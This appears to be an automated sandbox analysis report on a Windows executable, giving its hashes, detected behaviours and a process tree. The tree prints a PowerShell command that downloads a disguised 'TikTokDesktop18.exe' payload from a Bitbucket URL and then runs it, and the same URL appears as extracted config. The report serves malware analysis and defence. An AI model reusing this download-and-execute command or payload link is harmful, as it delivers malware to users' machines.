Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
27/11/2024, 12:32
Static task
static1
Behavioral task
behavioral1
Sample
b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe
Resource
win7-20240903-en
General
-
Target
b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe
-
Size
89KB
-
MD5
ee5fa211e0dfb2e96a3953d4bace7850
-
SHA1
65884c08e3876e8aeab4f5172d48e203e60ab75b
-
SHA256
b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8
-
SHA512
ff98b501ac22fdfc0b458b9e726388bbfe8d775e3988d83312a6551cdd57d21de1d87b3f8d9bdf4f9ec50cfda2e5b360e136d09e8f76000301e510ee63accf65
-
SSDEEP
1536:z7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfAw3Oj:v7DhdC6kzWypvaQ0FxyNTBfAl
Malware Config
Extracted
https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2580 powershell.exe 6 2580 powershell.exe -
pid Process 2580 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 4 bitbucket.org 5 bitbucket.org 6 bitbucket.org -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2580 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2580 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2008 wrote to memory of 1212 2008 b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe 31 PID 2008 wrote to memory of 1212 2008 b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe 31 PID 2008 wrote to memory of 1212 2008 b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe 31 PID 2008 wrote to memory of 1212 2008 b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe 31 PID 1212 wrote to memory of 2580 1212 cmd.exe 32 PID 1212 wrote to memory of 2580 1212 cmd.exe 32 PID 1212 wrote to memory of 2580 1212 cmd.exe 32 PID 1212 wrote to memory of 2508 1212 cmd.exe 33 PID 1212 wrote to memory of 2508 1212 cmd.exe 33 PID 1212 wrote to memory of 2508 1212 cmd.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe"C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8102.tmp\8103.tmp\8104.bat C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
C:\Windows\system32\cmd.execmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;3⤵PID:2508
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
260B
MD51904675eec0f302424c4bde0956dab54
SHA1267c3174e35e0e2a7d104f98b3326f313f2e464e
SHA25645fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6
SHA512fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3